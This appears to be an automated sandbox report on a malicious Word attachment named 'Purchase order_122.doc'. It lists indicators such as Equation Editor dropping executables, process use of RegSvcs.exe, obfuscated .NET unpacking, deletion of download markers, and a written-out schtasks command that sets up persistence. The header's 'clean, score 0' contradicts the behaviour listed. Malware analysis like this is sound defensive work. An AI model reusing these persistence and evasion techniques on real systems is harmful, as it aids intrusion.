Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: Purchase order_122.doc

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{70bb352e-dceb-4105-9fdd-010e83e28b1b}
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Mutant created: \Sessions\1\BaseNamedObjects\ZXYpidgSeDxfiqu

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File created: C:\Program Files (x86)\SMTP Service

Jump to behavior

Source: catzjt7863.exe

String found in binary or memory: $c2808ccb-5ae8-48e8-add6-1570f353a9d0

Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdblbu source: RegSvcs.exe, 00000007.00000002.704375005.00000000001E6000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdbs.pdby source: RegSvcs.exe, 00000007.00000002.706338974.00000000047FD000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb\W source: RegSvcs.exe, 00000007.00000002.704375005.00000000001E6000.00000004.00000040.sdmp
Source:	Binary string: indows\System.pdbpdbtem.pdb0. source: RegSvcs.exe, 00000007.00000002.706338974.00000000047FD000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\System.pdbgs source: RegSvcs.exe, 00000007.00000002.704375005.00000000001E6000.00000004.00000040.sdmp
Source:	Binary string: RegSvcs.pdb source: smtpsvc.exe
Source:	Binary string: ystem.pdb(gR- source: RegSvcs.exe, 00000007.00000002.704389606.00000000001ED000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.704389606.00000000001ED000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.704389606.00000000001ED000.00000004.00000040.sdmp
Source:	Binary string: System.pdbX source: RegSvcs.exe, 00000007.00000002.706338974.00000000047FD000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.RegSvcs.exe.400000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_001A70F8 push ecx; retn 001Ah	4_2_001A70F9
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00348530 push esp; retf 0033h	4_2_00348531
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00346A61 pushfd ; iretd	4_2_00346A62
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00348640 pushad ; retf	4_2_00348641
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_005532B7 push cs; ret	7_2_005532B8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_0056410E push es; retn 0000h	7_2_0056410B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_0056410E push es; ret	7_2_005641D4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_00563DFF push es; ret	7_2_005641D4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_001D749C push ecx; ret	7_2_001D749D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_001D9880 push ecx; retf 001Dh	7_2_001D98A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_001D74A8 push ebp; ret	7_2_001D74A9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_004A07F8 push ss; ret	7_2_004A07FC

Source: initial sample	Static PE information: section name: .text entropy: 7.95466244747
Source: initial sample	Static PE information: section name: .text entropy: 7.95466244747
Source: initial sample	Static PE information: section name: .text entropy: 7.95466244747

Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.0.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.0.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.0.RegSvcs.exe.400000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.0.RegSvcs.exe.400000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catzx[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\catzjt7863.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	File created: C:\Users\user\AppData\Roaming\eWoGxZG.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\eWoGxZG' /XML 'C:\Users\user\AppData\Local\Temp\tmp566B.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
